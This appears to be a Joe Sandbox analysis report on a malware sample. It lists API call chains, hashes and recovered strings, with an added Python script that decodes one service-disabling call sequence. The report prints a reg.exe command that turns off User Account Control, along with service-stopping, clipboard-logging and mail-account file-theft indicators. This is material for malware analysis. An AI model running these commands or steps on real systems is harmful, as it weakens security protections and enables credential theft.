                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                            • String ID:
                                                                                            • API String ID: 1922816806-0
                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 3594823470-0
                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                            • String ID:
                                                                                            • API String ID: 493672254-0
                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
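The six calls above are the standard sequence for reconfiguring an existing service: open the service control manager, open the service, change its configuration, close the handles. The numeric arguments carry the meaning: desired access 2 on the manager is SC_MANAGER_CREATE_SERVICE, desired access 2 on the service is SERVICE_CHANGE_CONFIG, and a dwStartType of 4 is SERVICE_DISABLED. Both access rights need administrative privileges. Two caveats: the report does not resolve the service name passed to OpenServiceW (it prints 00000000), so this entry alone does not say which service is being disabled; and the 000000FF printed for dwServiceType and dwErrorControl is read here as the 8-bit immediate of `push -1`, i.e. SERVICE_NO_CHANGE (0xFFFFFFFF), which is an interpretation rather than a value the report states. The Python below is an added example, not code from the report or the sample: it parses the report's own API lines (copied verbatim) and decodes them into the ADVAPI32 constant names, so the same decoder can be pointed at other entries of this kind.

```python
import re

# The four configuration-relevant lines from the report entry above, verbatim. The
# extra stack values the plugin prints after the documented parameters are ignored.
REPORT_LINES = [
    "OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC",
    "OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10",
    "CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D",
    "ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52",
]

SERVICE_NO_CHANGE = 0xFFFFFFFF
START_TYPES = {
    0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
    3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED",
}
SC_MANAGER_ACCESS = {
    0x0001: "SC_MANAGER_CONNECT", 0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE", 0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS", 0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP", 0x0040: "SERVICE_PAUSE_CONTINUE",
    0x0080: "SERVICE_INTERROGATE", 0x0100: "SERVICE_USER_DEFINED_CONTROL",
}

CALL_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")


def parse_call(line: str):
    """Split a Joe Sandbox API line into (api, args, ref); '?' becomes None."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError("not a Joe Sandbox API line: " + line)
    api, _module, argstr, ref = m.groups()
    args = [None if t.strip() == "?" else int(t, 16) for t in argstr.split(",")]
    return api, args, int(ref, 16)


def flag_names(value: int, table: dict) -> list:
    names = [name for bit, name in table.items() if value & bit]
    return names or [hex(value)]


def is_no_change(value) -> bool:
    # SERVICE_NO_CHANGE is pushed as `push -1`; the report prints that immediate as
    # 000000FF. Treating 0xFF as the truncated -1 is an interpretation (assumption),
    # not a value the report states.
    return value in (SERVICE_NO_CHANGE, 0xFF)


def decode_call(api: str, args: list) -> dict:
    if api == "OpenSCManagerW":
        return {"api": api, "lpMachineName": args[0], "lpDatabaseName": args[1],
                "dwDesiredAccess": flag_names(args[2], SC_MANAGER_ACCESS)}
    if api == "OpenServiceW":
        # lpServiceName is printed as 00000000: the report did not resolve it.
        return {"api": api, "lpServiceName": args[1] or None,
                "dwDesiredAccess": flag_names(args[2], SERVICE_ACCESS)}
    if api == "ChangeServiceConfigW":
        svc_type, start, err = args[1], args[2], args[3]
        return {"api": api,
                "dwServiceType": "SERVICE_NO_CHANGE" if is_no_change(svc_type) else hex(svc_type),
                "dwStartType": START_TYPES.get(start, hex(start)),
                "dwErrorControl": "SERVICE_NO_CHANGE" if is_no_change(err) else hex(err),
                "lpBinaryPathName": args[4] or None}
    return {"api": api}


def decode_sequence(lines: list) -> list:
    return [decode_call(*parse_call(line)[:2]) for line in lines]


def verdict(decoded: list) -> str:
    """One-line summary of what the chain does to the (unnamed) target service."""
    change = next((c for c in decoded if c["api"] == "ChangeServiceConfigW"), None)
    if change is None:
        return "no ChangeServiceConfigW in sequence"
    untouched = [k for k in ("dwServiceType", "dwErrorControl") if change[k] == "SERVICE_NO_CHANGE"]
    return "start type -> %s; unchanged: %s" % (change["dwStartType"], ", ".join(untouched) or "none")


if __name__ == "__main__":
    for entry in decode_sequence(REPORT_LINES):
        print(entry)
    print(verdict(decode_sequence(REPORT_LINES)))
```

The decoded ChangeServiceConfigW call changes nothing but the start type: binary path, account, dependencies and display name are all NULL (left as they are), so the effect is to disable one existing service in place.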
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                            • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                            • _free.LIBCMT ref: 10005B2D
                                                                                            • _free.LIBCMT ref: 10005B55
                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                            • _abort.LIBCMT ref: 10005B74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            APIs
                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Enum$InfoQueryValue
                                                                                            • String ID: [regsplt]$DG
                                                                                            • API String ID: 3554306468-1089238109
                                                                                            APIs
                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                            • API String ID: 4036392271-1520055953
                                                                                            APIs
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                            • API String ID: 2974294136-753205382
                                                                                            APIs
                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                            • String ID: 0$MsgWindowClass
                                                                                            • API String ID: 2877667751-2410386613
                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                            Strings
                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                            • API String ID: 2922976086-4183131282
                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                            APIs
                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
